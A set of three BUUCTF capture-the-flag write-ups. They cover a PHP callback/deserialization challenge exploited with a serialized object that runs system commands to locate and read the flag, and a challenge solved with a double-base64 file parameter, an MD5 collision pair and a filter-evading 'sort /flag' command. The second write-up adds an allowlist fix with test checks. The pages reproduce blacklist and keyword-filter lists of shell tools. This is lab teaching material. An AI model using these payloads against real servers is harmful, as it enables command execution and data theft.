1. BUUCTF write-ups: [强网杯 2019] 高明的黑客
Download the source and take a look: there are a lot of shells, and most of them should be useless. This challenge requires writing a Python script to find the usable one. I can't really read the shells either, though.
2. BUUCTF write-ups: [网鼎杯 2020 朱雀组] phpweb
Visit /index.php and look at the POST form parameters: func carries a function name and p carries its argument. First try the system function.
Keywords are evidently filtered, so try reading the source with file_get_contents instead.
Now analyse the source.
<?php
$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
// blacklist
function gettime($func, $p) {
    $result = call_user_func($func, $p);
    // the first argument, callback, is the function to call; the remaining arguments are passed to it
    $a = gettype($result);
    if ($a == "string") {
        return $result;
        // returned only when the result is a string
    } else {
        return "";
    }
}
class Test {
    var $p = "Y-m-d h:i:s a";
    var $func = "date";
    function __destruct() {
        // destructor
        if ($this->func != "") {
            echo gettime($this->func, $this->p);
        }
    }
}
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];
if ($func != null) {
    $func = strtolower($func);
    // strtolower() converts the string to lowercase
    if (!in_array($func, $disable_fun)) {
        echo gettime($func, $p);
    } else {
        die("Hacker...");
    }
}
?>
The deserialization function is not on the blacklist, so we can pass it as func and carry out the injection through the serialized content, since Test::__destruct hands the object's func and p straight to gettime.
Construct the serialized content:
<?php
class Test {
    var $p = "Y-m-d h:i:s a";
    var $func = "date";
}
$p = new Test();
$p->func = "system";
$p->p = "ls /"; // list the root directory
// $p->p = "find / -name 'flag*'"; // locate the flag file
echo serialize($p);
?>
The payload to send is:
O:4:"Test":2:{s:1:"p";s:4:"ls /";s:4:"func";s:6:"system";}
This lists the root directory, but the flag is not there, so next locate the flag file and print it directly.
<?php
class Test {
    var $p = "Y-m-d h:i:s a";
    var $func = "date";
}
$p = new Test();
$p->func = "system";
$p->p = "cat $(find / -name flag*)";
echo serialize($p);
?>
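For contrast, here is how the same date-display feature looks when the sink is allowlisted instead of blacklisted. This is an added example, not the challenge's code: function names from the request are only ever used as keys into a fixed map, so neither system nor unserialize is reachable, and the Test gadget from the write-up reaches nothing useful even if it is revived. ALLOWED_FUNCS, safe_gettime and check are names chosen for this example.

```php
<?php
declare(strict_types=1);
// Added example (not the challenge's code): allowlist the callable instead of
// denylisting names. A user-chosen name is never passed to call_user_func() directly.
const ALLOWED_FUNCS = [
    'date'       => 'date',
    'strtoupper' => 'strtoupper',
];

function safe_gettime(string $func, string $p): string {
    $func = strtolower($func);
    if (!array_key_exists($func, ALLOWED_FUNCS)) {   // reject anything not allowlisted
        return '';
    }
    $result = call_user_func(ALLOWED_FUNCS[$func], $p);
    return is_string($result) ? $result : '';
}

class Test {
    public string $p = 'Y-m-d h:i:s a';
    public string $func = 'date';
    public function __destruct() {
        if ($this->func !== '') {
            echo safe_gettime($this->func, $this->p), "\n";
        }
    }
}

function check(string $label, bool $ok): void {
    echo ($ok ? 'PASS ' : 'FAIL '), $label, "\n";
}

// Constructed inputs: the write-up's gadget payload and a direct function-name attempt.
$gadget = 'O:4:"Test":2:{s:1:"p";s:4:"ls /";s:4:"func";s:6:"system";}';
check('unserialize not reachable as func', safe_gettime('unserialize', $gadget) === '');
check('system not reachable as func',      safe_gettime('system', 'ls /') === '');
check('allowlisted date still works',      safe_gettime('date', 'Y') === date('Y'));
check('lookup is case-insensitive',        safe_gettime('STRTOUPPER', 'abc') === 'ABC');

// Even if attacker data reached unserialize() elsewhere, the revived object's
// __destruct only hits the allowlisted sink and echoes an empty string.
$obj = unserialize($gadget, ['allowed_classes' => ['Test']]);
check('gadget object cannot run system',
      $obj instanceof Test && safe_gettime($obj->func, $obj->p) === '');
unset($obj); // __destruct fires here and prints an empty line, not command output
```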
3. BUUCTF write-ups: [安洵杯 2019] easy_web
The GET form takes two parameters, img and cmd, and img comes with a default value. After reading another write-up, the clue is in img: judging by its character set it should be base64-encoded. Decoding base64 twice gives "3535352e706e67", a hex string, which converts to "555.png", presumably the filename of the image shown on the page.
Apply the same encoding process to index.php, which ends up as "TmprMlpUWTBOalUzT0RKbE56QTJPRGN3". Capturing the response in Burp shows the base64-encoded source; decoding it yields the source below.
<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd']))
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));
$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
    echo '<img src ="./ctf3.jpeg">';
    die("xixi~ no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "<img src='data:image/gif;base64," . $txt . "'></img>";
    echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}
?>
<html>
<style>
body{
    background:url(./bj.png) no-repeat center center;
    background-size:cover;
    background-attachment:fixed;
    background-color:#CCCCCC;
}
</style>
<body>
</body>
</html>
Bypass the strict md5 comparison with two different strings that share an MD5 digest, then pass a command whose name is not caught by the filter (sort is not on the list).
?cmd=sort%20/flag
a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2